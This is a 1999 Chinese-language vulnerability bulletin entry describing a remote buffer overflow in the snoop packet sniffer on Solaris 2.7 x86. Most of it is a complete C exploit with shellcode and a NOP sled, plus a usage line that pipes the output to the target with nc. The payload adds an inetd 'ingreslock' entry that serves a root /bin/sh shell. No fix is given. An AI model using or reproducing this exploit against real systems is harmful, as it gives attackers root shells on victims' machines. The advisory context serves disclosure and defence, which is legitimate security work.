绿盟安全月刊->第4期->最新漏洞 Solaris 2.7 x86 snoop远程溢出漏洞

日期：1999-12-14


漏洞类型：远程   
  
发布日期：1999-12-04   
更新日期：1999-12-06   
  
影响系统：   
Solaris 2.7 x86   
  
漏洞描述：   
  
Snoop是个类似tcpdump的程序，是用来查看网络流通量。当以-v方式运行snoop时，
如果域名长度大于1024个字节，会产生远程溢出漏洞，   
这个漏洞允许造成可以以运行snoop(通常为root)的身份远程进入系统。   
  
检验程序：   
  
Exploit (by cheez):   
  
/*   
Remote Solaris 2.7 x86 snoop exploit   
  
Run with ( ./snp ) | nc -u target_host_network 53   
requires target host to be running "snoop -v"   
  
Thanks str/horizon for shellcodes (hi plaguez)   
*/   
  
#include   
#include   
#include   
#include   
  
char shell[] =   
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"   
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"   
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"   
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"   
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"   
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"   
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"   
"\x68\x28\x2D\x63\x29 echo w00w00;"   
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"   
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";   
  
#define SIZE 2048   
#define NOPDEF 349   
#define DEFOFF 0   
  
char buffer[SIZE];   
const char x86_nop=0x90;   
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;   
  
int main (int argc, char *argv[])   
{   
int i;   
  
if (argc > 1) offset += strtol(argv[1], NULL, 0);   
if (argc > 2) nop += strtoul(argv[2], NULL, 0);   
  
memset(buffer, x86_nop, SIZE);   
memcpy(buffer+nop, shell, strlen(shell));   
  
for (i = nop+strlen(shell); i < SIZE-4; i += 4)   
*((int *) &buffer[i]) = esp+offset;   
  
fprintf(stderr,"0x%x\n", esp+offset);   
printf("%s", buffer);   
  
return 0;   
}   
  
解决办法：   
暂无